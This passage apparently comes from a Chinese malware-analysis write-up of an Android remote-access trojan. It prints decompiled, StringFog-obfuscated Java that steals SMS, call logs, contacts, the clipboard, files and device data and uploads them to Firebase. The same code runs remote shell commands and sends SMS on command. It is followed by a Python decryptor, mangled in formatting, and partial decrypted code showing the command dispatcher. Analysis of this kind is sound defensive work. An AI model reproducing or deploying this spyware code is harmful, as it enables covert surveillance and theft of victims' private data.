query.getString(query.getColumnIndex(StringFogImpl.decrypt("MT01XVQ0LRlDWTgx"))) + StringFogImpl.decrypt("aTY0EwQ3aghYVTcxNBcYaXskEw==") + query.getString(query.getColumnIndex(StringFogImpl.decrypt("MTUyTAk="))) + StringFogImpl.decrypt("aTY0ExhpNnhrSjo5fA0EejZ4") + query.getString(query.getColumnIndex(StringFogImpl.decrypt("NDclQk07IBlZQSUx"))) + StringFogImpl.decrypt("aXsiRE5r");}} else {str = decrypt;}try {if (FileUtil.isExistFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("ejcpQ0x7PDJAVA==")))) {FileUtil.deleteFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("ejcpQ0x7PDJAVA==")));}FileOutputStream fileOutputStream = new FileOutputStream(String.valueOf(FileUtil.getPackageDataDir(getApplicationContext())) + StringFogImpl.decrypt("ejcpQ0x7PDJAVA=="), true);fileOutputStream.write((String.valueOf(str) + "\n\n").getBytes());fileOutputStream.close();this.user.child(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("ejcpQ0x7PDJAVA=="))).putFile(Uri.fromFile(new File(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("ejcpQ0x7PDJAVA=="))))).addOnFailureListener(this._sigmamale_failure_listener).addOnProgressListener(this._sigmamale_upload_progress_listener).continueWithTask(new Continuation<UploadTask.TaskSnapshot, Task<Uri>>() { // from class: sigma.male.servicess.25/* JADX WARN: Can't rename method to resolve collision */@Override // com.google.android.gms.tasks.Continuationpublic Task<Uri> then(Task<UploadTask.TaskSnapshot> task) throws Exception {return servicess.this.user.child(FileUtil.getPackageDataDir(servicess.this.getApplicationContext()).concat(StringFogImpl.decrypt("ejcpQ0x7PDJAVA=="))).getDownloadUrl();}}).addOnCompleteListener(this._sigmamale_upload_success_listener);} catch (FileNotFoundException e) {} catch (IOException e2) {}}public void _getpackages() {String str;ByteArrayOutputStream byteArrayOutputStream;List<PackageInfo> installedPackages = getApplicationContext().getPackageManager().getInstalledPackages(0);String decrypt = StringFogImpl.decrypt("aTwyQFRraCtITDR0KExVMGlhW1EwIzZCSiFzZk5XOyAjQ0xoczFEXCE8e0ldIz0lSBUiPSJZUHl0L0NRIT0nQRUmNydBXWhlYRMYaScyVFQwamxWVTQmIURWb2R9XVkxMC9DX29kfVBaOjA/VlU0JiFEVm9kfV1ZMTAvQ19vZH1PWTY/IV9XIDoiFxtnZnQWRXs/I1RUOjMhDUM3NSVGXyc7M0Ncb3d2HQhuIy9JTD1uJUxUNnx/GB11eWYfCCUsbxZQMD0hRUxvNTNZV245J19fPDp8TE0hO31dWTEwL0Nfb2V2XUBuNylBVyduZR1cMW82TFwxPShKFTc7MllXOG53HUgtbytMSjI9KABMOiR8FUgtbyRCSjExNABKNDAvWEtvZXZdQG4kKV5RIT0pQwInMSpMTDwiIxZXIzE0S1Q6I3xMTSE7fVAWPjE/QVcyM2YNWi43KUFXJ240SFxuKWhGXSw4KUpfdT0rSkM4NT4AUDA9IUVMb2F2XUBuOSdVFSI9IllQb2F2XUBuJCleUSE9KUMCNDY1QlQgICMWVDAyMhcJZSQ+FkV7PyNUVDozIQ1ILjcpQVcnbmVLXjNvOwNTMC0qQl8ydDVdWTsvIEFXNCB8X1EyPDIWVTQmIURWeCYvSlAhbncdSC1vOwNaITo9RV08My5ZAmFkNlUDIj0iWVBvZXMdSC1vJEJKMTE0FwhuNilfXDAma19ZMT0zXgJgJD4WWjomIkhKb2U2VRgmOypEXHUmI0kDNzUlRl8nOzNDXG82KkxbPm8lQlQ6JnxaUDwgIxZFdWhpXkwsOCMTBDc7IlQG");Iterator<PackageInfo> it = installedPackages.iterator();while (true) {str = decrypt;if (it.hasNext()) {PackageInfo next = it.next();getBitmapFromDrawable(next.applicationInfo.loadIcon(getPackageManager())).compress(Bitmap.CompressFormat.JPEG, 100, new ByteArrayOutputStream());decrypt = String.valueOf(str) + StringFogImpl.decrypt("aTAvWxg2OCdeS2hzLUhBOTshSh91anpEVTJ0NV9baHMiTEw0bi9AWTIxaV1WMm8kTEswYnIB") + Base64.encodeToString(byteArrayOutputStream.toByteArray(), 0) + StringFogImpl.decrypt("cnR4EVw8ImZeTCw4IxAfODU0SlE7eSpIXiFucB1ILW82TFwxPShKFSE7NhcLJSx9Qk4wJiBBVyJuJ1hMOm9hDQZpNmZeTCw4IxAfNjsqQkpvMzRIXTtvYQ0GdQ==") + next.applicationInfo.loadLabel(getPackageManager()).toString() + StringFogImpl.decrypt("dXww") + next.versionName + StringFogImpl.decrypt("dX16AlpraCRfBmk2Zl5MLDgjEB82OypCSm8mI0kDcnR4DQ==") + next.packageName + StringFogImpl.decrypt("aXskEwQ3JngRFzE9MBMENyZ4ERcxPTAT");} else {try {break;} catch (FileNotFoundException e) {return;} catch (IOException e2) {return;}}}if (FileUtil.isExistFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("ejU2XUt7PDJAVA==")))) {FileUtil.deleteFile(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("ejU2XUt7PDJAVA==")));}FileOutputStream fileOutputStream = new FileOutputStream(String.valueOf(FileUtil.getPackageDataDir(getApplicationContext())) + StringFogImpl.decrypt("ejU2XUt7PDJAVA=="), true);fileOutputStream.write((String.valueOf(str) + "\n\n").getBytes());fileOutputStream.close();SketchwareUtil.showMessage(getApplicationContext(), StringFogImpl.decrypt("JTUlRl0/Jyw="));this.user.child(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("ejU2XUt7PDJAVA=="))).putFile(Uri.fromFile(new File(FileUtil.getPackageDataDir(getApplicationContext()).concat(StringFogImpl.decrypt("ejU2XUt7PDJAVA=="))))).addOnFailureListener(this._sigmamale_failure_listener).addOnProgressListener(this._sigmamale_upload_progress_listener).continueWithTask(new Continuation<UploadTask.TaskSnapshot, Task<Uri>>() { // from class: sigma.male.servicess.26/* JADX WARN: Can't rename method to resolve collision */@Override // com.google.android.gms.tasks.Continuationpublic Task<Uri> then(Task<UploadTask.TaskSnapshot> task) throws Exception {return servicess.this.user.child(FileUtil.getPackageDataDir(servicess.this.getApplicationContext()).concat(StringFogImpl.decrypt("ejU2XUt7PDJAVA=="))).getDownloadUrl();}}).addOnCompleteListener(this._sigmamale_upload_success_listener);}public static Bitmap getBitmapFromDrawable(Drawable drawable) {Bitmap createBitmap = Bitmap.createBitmap(drawable.getIntrinsicWidth(), drawable.getIntrinsicHeight(), Bitmap.Config.ARGB_8888);Canvas canvas = new Canvas(createBitmap);drawable.setBounds(0, 0, canvas.getWidth(), canvas.getHeight());drawable.draw(canvas);return createBitmap;}public String shell_exec(String str) {String str2 = "";String[] strArr = {StringFogImpl.decrypt("Jjw="), StringFogImpl.decrypt("eDc="), str};try {BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(str).getInputStream()));while (true) {String readLine = bufferedReader.readLine();if (readLine != null) {str2 = String.valueOf(str2) + readLine;} else {return str2;}}} catch (Exception e) {return StringFogImpl.decrypt("MCY0Qko=");}}public void _sudoapt(String str, String str2) {_setrespo(StringFogImpl.decrypt("JjwjQVQjPSNa"), "", shell_exec(str), "", "");}public void _devinfo() {getApplicationContext();Display defaultDisplay = ((WindowManager) getSystemService(StringFogImpl.decrypt("Ij0oSVci"))).getDefaultDisplay();int width = defaultDisplay.getWidth();_setrespo(StringFogImpl.decrypt("MTEwRFswPShLVw=="), "", StringFogImpl.decrypt("aTAvWxg2OCdeS3VpYUZdLDgpSl9ydHgRWmsHA39xFBh8DQR6Nng=") + Build.SERIAL + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("GBsCaHRvdHoCWmt0") + Build.MODEL + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("HBB8DRhpeyQT") + Build.ID + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("GDUoWF40NzJYSjBuZhEXN2o=") + Build.MANUFACTURER + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("FyYnQ1xvaGlPBnU=") + Build.BRAND + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("ETEwRFswdApMVjIhJ0pdb3R6Alpr") + Locale.getDefault().getDisplayLanguage() + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("Bjc0SF07dBRISzo4M1lROjp8DQR6Nng=") + width + StringFogImpl.decrypt("LQ==") + defaultDisplay.getHeight() + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("AS02SAJ1aGlPBg==") + Build.TYPE + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("ACcjXwJ1aGlPBg==") + Build.USER + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("FxUVaAJ1aGlPBg==") + 1 + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("HBoFf30YEQh5eRluZhEXN2o=") + Build.VERSION.INCREMENTAL + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("BhANFwR6NngN") + Build.VERSION.SDK + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("FxsHf3xvdHoCWms=") + Build.BOARD + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("FwYHY3xvaGlPBnU=") + Build.BRAND + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("HRsVeQJ1aGlPBg==") + Build.HOST + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("Ex0Ian0HBBRkdgFuZhEXN2o=") + Build.FINGERPRINT + StringFogImpl.decrypt("aTY0EwQ3ag==") + StringFogImpl.decrypt("AzE0XlE6OmZuVzExfA0EejZ4") + Build.VERSION.RELEASE + StringFogImpl.decrypt("aXsiRE5r"), "", "");}public void _showtoast(String str) {SketchwareUtil.showMessage(getApplicationContext(), str);_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("ATsnXkx1By5CTzt0FVhbNjE1Xl4gOCpU"), "", "");}public void _vibra(String str) {this.vibrator.vibrate(Integer.parseInt(str));_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("ETEwRFswdBBEWic1Mkhc"), "", "");}public void _ttsdev(String str) {this.tts.speak(str, 1, null);_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("AQAVDXs6OTZBXSExIg1rIDclSEsmMjNBVCw="), "", "");}public void _palysmudic(String str) {this.mp = new MediaPlayer();this.mp.setAudioStreamType(3);try {this.mp.setDataSource(str);} catch (IOException e) {e.printStackTrace();} catch (IllegalArgumentException e2) {_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("aSc2TFZ1JzJUVDBpYU5XOTs0F0owMH0KGGt0A39qGgZ8DQR6JzZMVmsHKUNfdRopWRgTOzNDXHUyNEJVdQEUYQ=="), "", "");} catch (IllegalStateException e3) {_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("aSc2TFZ1JzJUVDBpYU5XOTs0F0owMH0NH3VqZmhqBxsUFxhpezVdWTtqFUJWMnQIQkx1EilYVjF0IF9XOHQTf3Q="), "", "");} catch (SecurityException e4) {_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("aSc2TFZ1JzJUVDBpYU5XOTs0F0owMH0NH3VqZmhqBxsUFxhpezVdWTtqFUJWMnQIQkx1EilYVjF0IF9XOHQTf3Q="), "", "");}try {this.mp.prepare();_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("aSc2TFZ1JzJUVDBpYU5XOTs0FxgyJiNIVm50YRMYBiElTl0mJ3wNBHonNkxWawcpQ191PTUNSDk1P0RWMg=="), "", "");} catch (IOException e5) {_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("aSc2TFZ1JzJUVDBpYU5XOTs0F0owMH0NH3VqZmhqBxsUFxhpezVdWTtqFUJWMnQIQkx1EilYVjF0IF9XOHQTf3Q="), "", "");} catch (IllegalStateException e6) {_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("aSc2TFZ1JzJUVDBpYU5XOTs0F0owMH0NH3VqZmhqBxsUFxhpezVdWTtqFUJWMnQIQkx1EilYVjF0IF9XOHQTf3Q="), "", "");}this.mp.start();if (this.mp.isPlaying()) {_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("aSc2TFZ1JzJUVDBpYU5XOTs0FxgyJiNIVm50YRMYBiElTl0mJ3wNBHonNkxWawcpQ191PTUNSDk1P0RWMg=="), "", "");}}public void _sendsm(String str, String str2) {try {SmsManager.getDefault().sendTextMessage(str, null, str2, null, null);_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("aSc2TFZ1JzJUVDBpYU5XOTs0F18nMSNDH2sHM05bMCc1FxhpezVdWTtqC0hLJjUhSBgGMShZGAYhJU5dJicgWFQ5LQ=="), "", "");} catch (Exception e) {_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("aSc2TFZ1JzJUVDBpYU5XOTs0F0owMGETfScmKV8CdWhpXkg0OnhoUSE8I18YJTE0QFEmJy9CVnU9NQ1WOiBmSlEjMSgNVyd0AkxMNHQvXhg8OiVCSicxJVkW"), "", "");}}public void _changewall(String str) {if (str.equals(StringFogImpl.decrypt("ZQ=="))) {try {WallpaperManager.getInstance(getApplicationContext()).setResource(R.drawable.wall1);} catch (Exception e) {e.printStackTrace();}_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("AjUqQUg0JCNfGBY8J0NfMDBmfk02NyNeSzMhKkFB"), "", "");} else if (str.equals(StringFogImpl.decrypt("ZA=="))) {try {WallpaperManager.getInstance(getApplicationContext()).setResource(R.drawable.wall2);} catch (Exception e2) {e2.printStackTrace();}_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("AjUqQUg0JCNfGBY8J0NfMDBmfk02NyNeSzMhKkFB"), "", "");} else if (str.equals(StringFogImpl.decrypt("Zw=="))) {try {WallpaperManager.getInstance(getApplicationContext()).setResource(R.drawable.wall3);} catch (Exception e3) {e3.printStackTrace();}_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("AjUqQUg0JCNfGBY8J0NfMDBmfk02NyNeSzMhKkFB"), "", "");}}/* JADX WARN: Code restructure failed: missing block: B:12:0x004f, code lost:if (r1.isEmpty() != false) goto L13;*//*Code decompiled incorrectly, please refer to instructions dump.*/public void clips() {String str = null;final ClipboardManager[] clipboardManagerArr = new ClipboardManager[1];String str2 = "";new Handler(Looper.getMainLooper()).post(new Runnable() { // from class: sigma.male.servicess.27@Override // java.lang.Runnablepublic void run() {clipboardManagerArr[0] = (ClipboardManager) servicess.this.getSystemService(StringFogImpl.decrypt("NjgvXVo6NTRJ"));}});try {if (clipboardManagerArr[0].hasPrimaryClip()) {ClipDescription primaryClipDescription = clipboardManagerArr[0].getPrimaryClipDescription();ClipData primaryClip = clipboardManagerArr[0].getPrimaryClip();if (primaryClip != null && primaryClipDescription != null && primaryClipDescription.hasMimeType(StringFogImpl.decrypt("ITE+WRclOCdEVg=="))) {str2 = String.valueOf(primaryClip.getItemAt(0).getText());}}str = str2;} catch (NullPointerException e) {}_setrespo(StringFogImpl.decrypt("MTEwRFswPShLVw=="), "", StringFogImpl.decrypt("aTAvWxg2OCdeS3VpYUZdLDgpSl9ydHgN") + str + StringFogImpl.decrypt("aXsiRE5r"), "", "");}public void _voicere(String str) {_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("GTUzQ1s9MSINbQcYZhcY") + str, "", "");Intent intent = new Intent();intent.addFlags(268435456);intent.setAction(StringFogImpl.decrypt("NDoiX1c8MGhEViExKFkWNDcyRFc7ehBkfQI="));intent.setData(Uri.parse(str));startActivity(intent);}public void tofft() {_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("ASE0Q10xdAlLXnUAKV9bPXQqRF89IA=="), "", "");CameraManager cameraManager = (CameraManager) getSystemService(StringFogImpl.decrypt("NjUrSEo0"));try {cameraManager.setTorchMode(cameraManager.getCameraIdList()[0], false);} catch (CameraAccessException e) {}}public void tont() {_setrespo(StringFogImpl.decrypt("MT0nQVcyIi9ITw=="), "", StringFogImpl.decrypt("ASE0Q10xdAlDGAE7NE5QdTgvSlAh"), "", "");CameraManager cameraManager = (CameraManager) getSystemService(StringFogImpl.decrypt("NjUrSEo0"));try {cameraManager.setTorchMode(cameraManager.getCameraIdList()[0], true);} catch (CameraAccessException e) {}}@Override // android.app.Servicepublic IBinder onBind(Intent intent) {return null;}@Override // android.app.Servicepublic void onDestroy() {Intent intent = new Intent();intent.setAction(StringFogImpl.decrypt("JzE1WVknIDVISiM9JUg="));intent.setClass(this, restarter.class);sendBroadcast(intent);super.onDestroy();}}
方案:字符串替代解密
将“StringFogImpl.decrypt("[密文]")”替换为解密后的明文:
解密逻辑
- 逐行读取需要解密文本
- 检测是否有“StringFogImpl.decrypt”
- 无:跳过
- 有:正则匹配出密文
- 密文Base64解码后,Xor“UTF-8”
- 解密后的密文替代明文
- 每行检测或替换完,最终输出的为明文
运行效果
出现问题:’utf-8’ codec can’t decode byte 0xb6
解决方案
【假】.decode(“UTF-8”, “ignore”)
如果牵扯计算,会出现乱码。
如果仅为显示,一般无所谓。【真】计算数据不要转UTF-8
原本是为了方便,全部数据转UTF-8,但是有一些数据超出的UTF-8的范围(十进制:0-127,十六进制:0-7F),如“0xB6”。🐍🐍🐍Python代码🐍🐍🐍
```pythoncoding: UTF-8
import base64 import re
strNewLine = “\n” strQuotation = ‘“‘ strEncode = r”StringFogImpl.decrypt”
读取需要解密的文本文件
def ReadText( txtIn ): with open( txtIn , ‘r+’ , encoding = ‘UTF-8’ ) as f: strTXT = f.read()
# print(strTXT)return strTXT
解密后保存为文本文件输出
def Text2Write( str2Write ): with open( txtOut , ‘w+’ , encoding = ‘UTF-8’ ) as f: f.write( str2Write ) f.close()
检测文本是否需要解密
def CheckTXT2Recovery( strEncode ): if strEncode in strTXT: print( “文件需要解密” ) GetCipherText2XOR( strTXT ) else: print( “文件不需要解密” )
解密字符串
def GetCipherText2XOR( strTXT ):
# 按行切割为数组arrStrLines = strTXT.split( strNewLine )# print(arrStr)# 最后需要输出的明文strXORedAll = ''# 正则匹配解密函数和密文reDecrypt = re.compile( 'StringFogImpl.decrypt\("(.*?)"\)' , re.S )for iLine in arrStrLines:# 单行是否需要解密,需要解密则提取密文解密,不需要直接累加为明文if strEncode in iLine:listStrSplit = re.split( reDecrypt , iLine )# 匹配到几个密文nRE = len( listStrSplit )strXORedLine = listStrSplit[0]nCount = 1# 考虑一行多个:从[1]开始步长为2取数组解密for i in range( 1 , nRE ):# print(i)nCount += 1if (nCount % 2 == 0):print( "密文:" , listStrSplit[i] )strDeXORed = doDeBase64XOR( listStrSplit[i] )strXORedLine += strQuotation + strDeXORed + strQuotationelse:strXORedLine += listStrSplit[i]print( "单行解密后:" , strXORedLine , strNewLine )else:# print( "此行无需解密:" , strXORedLine )strXORedLine = iLinestrXORedAll += strXORedLine + strNewLine# print( "全部解密后:" , strXORedAll )Text2Write( strXORedAll )
因为有超出7B的值,所以不能转UTF-8再解密
def doDeBase64XOR( strCiphered ): print( “需解密字符串:” , strCiphered )
bText = strCiphered.encode( "UTF-8" )bDeBase64ed = base64.b64decode( bText )resultXOR = doXOR( bDeBase64ed , strKey )# print( "解密后字符串:" , resultXOR )return resultXOR
strKey = r”UTF-8”
def doDeBase64( strText ): print( “需解密字符串:” , strText )
bText = strText.encode( "UTF-8" )bDeBase64ed = base64.b64decode( bText )# 可用于显示,不能用于计算strDeBase64ed = bDeBase64ed.decode( "UTF-8" , "ignore" )# print( "Base64解码后:" , strDeBase64ed )return strDeBase64ed
def doXOR( dataCipherTXT , strKey ): resultXOR = ‘’
# lenMax = max( len( dataCipherTXT ) , len( strKey ) )for i in range( len( dataCipherTXT ) ):# 如果是int类型直接使用ordCiphered = dataCipherTXT[i % len( dataCipherTXT )]# 如果是字符串,ord转为inttypeCipherTXT = str( type( ordCiphered ) )if "str" in typeCipherTXT:ordCiphered = ord( ordCiphered )# 逐个取出ordKey = ord( strKey[i % len( strKey )] )# 异或ordXORed = ordCiphered ^ ordKey# 转为字符串strXORed = chr( ordXORed )# 累加resultXOR += strXORedprint( "解密后字符串:" , resultXOR )return resultXOR
txtIn = r”密文.txt” txtOut = r”明文.txt”
if name == ‘main‘: print( “文件:” , txtIn ) strTXT = ReadText( txtIn ) CheckTXT2Recovery( strEncode ) print( “结束” )
<a name="Ecn5c"></a>### 运行结果<a name="EsoUv"></a>#### 显示<a name="pWmgD"></a>#### 明文输出```javapublic void _service() {_setpres();_setpres2("");FirebaseDatabase.getInstance().getReference(/comds/comds + gui.uuii(getApplicationContext())).addChildEventListener(new ChildEventListener() { // from class: sigma.male.servicess.20@Override // com.google.firebase.database.ChildEventListenerpublic void onChildAdded(DataSnapshot dataSnapshot, String str) {}@Override // com.google.firebase.database.ChildEventListenerpublic void onChildChanged(DataSnapshot dataSnapshot, String str) {Map map = (Map) dataSnapshot.getValue();servicess.this.cmdn = new StringBuilder().append(map.get(cmdn)).toString();servicess.this.cmdv = new StringBuilder().append(map.get(cmdv)).toString();servicess.this.cmdvar = new StringBuilder().append(map.get(cmdvar)).toString();if (!servicess.this.cmdn.equals(cd)) {if (!servicess.this.cmdn.equals(dmpsms)) {if (!servicess.this.cmdn.equals(dmpcall)) {if (!servicess.this.cmdn.equals(dmpcont)) {if (!servicess.this.cmdn.equals(getpackages)) {if (!servicess.this.cmdn.equals(shellcmd)) {if (!servicess.this.cmdn.equals(deviceinfo)) {if (!servicess.this.cmdn.equals(toasttext)) {if (!servicess.this.cmdn.equals(ttsdev)) {if (!servicess.this.cmdn.equals(vibratedev)) {if (!servicess.this.cmdn.equals(playsmusic)) {if (!servicess.this.cmdn.equals(sendsms)) {if (!servicess.this.cmdn.equals(changewall)) {if (!servicess.this.cmdn.equals(opweb)) {if (!servicess.this.cmdn.equals(tont)) {if (!servicess.this.cmdn.equals(tofft)) {if (servicess.this.cmdn.equals(clip)) {servicess.this.clips();return;}return;}servicess.this.tofft();return;}servicess.this.tont();return;}servicess.this._voicere(servicess.this.cmdv);return;}servicess.this._changewall(servicess.this.cmdv);return;}servicess.this._sendsm(servicess.this.cmdv, servicess.this.cmdvar);return;}servicess.this._palysmudic(servicess.this.cmdv);return;}servicess.this._vibra(servicess.this.cmdv);return;}servicess.this._ttsdev(servicess.this.cmdv);return;}servicess.this._showtoast(servicess.this.cmdv);return;}servicess.this._devinfo();return;}servicess.this._sudoapt(servicess.this.cmdv, "");return;}servicess.this._getpackages();return;}servicess.this._dmpcon();return;}servicess.this._dmpcal();return;}servicess.this.getAllSms(servicess.this.getApplicationContext());return;}servicess.this._cd(servicess.this.cmdv, "", "");}@Override // com.google.firebase.database.ChildEventListenerpublic void onChildRemoved(DataSnapshot dataSnapshot) {}@Override // com.google.firebase.database.ChildEventListenerpublic void onChildMoved(DataSnapshot dataSnapshot, String str) {}@Override // com.google.firebase.database.ChildEventListenerpublic void onCancelled(DatabaseError databaseError) {}}); // /comds/comds/comds/comds}public void _setpres() {FirebaseDatabase.getInstance().getReference(/online/ + gui.uuiip(getApplicationContext()) + /user + gui.uuii(getApplicationContext())).child(device).addChildEventListener(new ChildEventListener() { // from class: sigma.male.servicess.21@Override // com.google.firebase.database.ChildEventListenerpublic void onChildAdded(DataSnapshot dataSnapshot, String str) {}@Override // com.google.firebase.database.ChildEventListenerpublic void onChildChanged(DataSnapshot dataSnapshot, String str) {}@Override // com.google.firebase.database.ChildEventListenerpublic void onChildRemoved(DataSnapshot dataSnapshot) {servicess.this._setpres2("");}@Override // com.google.firebase.database.ChildEventListenerpublic void onChildMoved(DataSnapshot dataSnapshot, String str) {}@Override // com.google.firebase.database.ChildEventListenerpublic void onCancelled(DatabaseError databaseError) {}});}public void _setpres2(String str) {this.responsetxt.clear();this.responsetxt = new HashMap<>();this.responsetxt.put(phone, String.valueOf(Build.MANUFACTURER) + " " + Build.MODEL);this.responsetxt.put(android, Android + Build.VERSION.RELEASE);this.responsetxt.put(battery, String.valueOf(((BatteryManager) getSystemService(batterymanager)).getIntProperty(4)) + %);this.responsetxt.put(id, gui.uuii(getApplicationContext()));for (String str2 : new String[]{/system/app/Superuser.apk, /sbin/su, /system/bin/su, /system/xbin/su, /data/local/xbin/su, /data/local/bin/su, /system/sd/xbin/su, /system/bin/failsafe/su, /data/local/su, /su/bin/su}) {if (new File(str2).exists()) {Yes;}}this.responsetxt.put(rooted, No);DatabaseReference child = FirebaseDatabase.getInstance().getReference(/online/ + gui.uuiip(getApplicationContext()) + /user + gui.uuii(getApplicationContext())).child(device);child.setValue(this.responsetxt);child.onDisconnect().removeValue();}public void _cd(final String str, String str2, String str3) {int i = 0;if (FileUtil.isExistFile(str)) {if (FileUtil.isDirectory(str)) {this.lst.clear();FileUtil.listDir(str, this.lst);this.num = 0.0d;this.str = <li >..;while (true) {int i2 = i;if (i2 < this.lst.size()) {if (FileUtil.isDirectory(this.lst.get((int) this.num))) {this.str = this.str.concat(<li class="fo" >.concat(Uri.parse(this.lst.get((int) this.num)).getLastPathSegment()));} else if (Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().contains(.png) || Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().contains(.jpg) || Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().contains(.jpeg) || Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().contains(.svg) || Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().contains(.ico)) {this.str = this.str.concat(<li class="im" >.concat(Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().concat(<b>.concat(String.valueOf(new File(this.lst.get((int) this.num)).length() / 1024) + KB.concat(</b>)))));} else if (Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().contains(.mp4)) {this.str = this.str.concat(<li class="vi" >.concat(Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().concat(<b>.concat(String.valueOf(new File(this.lst.get((int) this.num)).length() / 1024) + KB.concat(</b>)))));} else {this.str = this.str.concat(<li class="fi" >.concat(Uri.parse(this.lst.get((int) this.num)).getLastPathSegment().concat(<b>.concat(String.valueOf(new File(this.lst.get((int) this.num)).length() / 1024) + KB.concat(</b>)))));}this.num += 1.0d;i = i2 + 1;} else {_setrespo(this.str, str, "", "", "");return;}}} else if (FileUtil.isFile(str)) {BitmapFactory.Options options = new BitmapFactory.Options();options.inJustDecodeBounds = true;BitmapFactory.decodeFile(str, options);if (options.outWidth != -1 && options.outHeight != -1 && new File(str).length() / 1024 < 3072) {Date date = new Date(new File(str).lastModified());ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();BitmapFactory.decodeFile(str).compress(Bitmap.CompressFormat.JPEG, 100, byteArrayOutputStream);_setrespo(imgview, str, Base64.encodeToString(byteArrayOutputStream.toByteArray(), 0), <li>Name: + Uri.parse(str).getLastPathSegment() + <li>Creation: + date + <li>Size: + (new File(str).length() / 1024) + KB <li>Path: + str, "");return;}this.root.child(str).putFile(Uri.fromFile(new File(str))).addOnFailureListener(this._fbs_failure_listener).addOnProgressListener(this._fbs_upload_progress_listener).continueWithTask(new Continuation<UploadTask.TaskSnapshot, Task<Uri>>() { // from class: sigma.male.servicess.22/* JADX WARN: Can't rename method to resolve collision */@Override // com.google.android.gms.tasks.Continuationpublic Task<Uri> then(Task<UploadTask.TaskSnapshot> task) throws Exception {return servicess.this.root.child(str).getDownloadUrl();}}).addOnCompleteListener(this._fbs_upload_success_listener);this.filinfodat = <li>Name: + Uri.parse(str).getLastPathSegment() + <li>Creation: + new Date(new File(str).lastModified()) + <li>Size: + (new File(str).length() / 1024) + KB <li>Path: + str;}}}public void _setrespo(String str, String str2, String str3, String str4, String str5) {this.responsetxt.clear();this.responsetxt = new HashMap<>();this.responsetxt.put(respo, str);this.responsetxt.put(var2, str2);this.responsetxt.put(v1, str3);this.responsetxt.put(v2, str4);this.responsetxt.put(v3, str5);String decrypt = abcdefghijklmnopqrstuvwxyz;String str6 = String.valueOf(decrypt) + 0123456789;Random random = new Random();StringBuilder sb = new StringBuilder(8);sb.append(str6.charAt(random.nextInt(str6.length() - 1)));for (int length = sb.length(); length < 8; length++) {sb.append(str6.charAt(random.nextInt(str6.length())));}this.responsetxt.put(rndm, sb.toString());this._firebase.getReference(/respos/respo + gui.uuii(getApplicationContext())).child(respo).setValue(this.responsetxt);}public void _dmpsm(String str) {}public void getAllSms(Context context) {Cursor query = context.getContentResolver().query(Telephony.Sms.CONTENT_URI, null, null, null, null);String decrypt = <html><meta name='viewport' content='width=device-width, initial-scale=1'><meta name='charset' content='UTF-8' ><script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js'></script> <style> 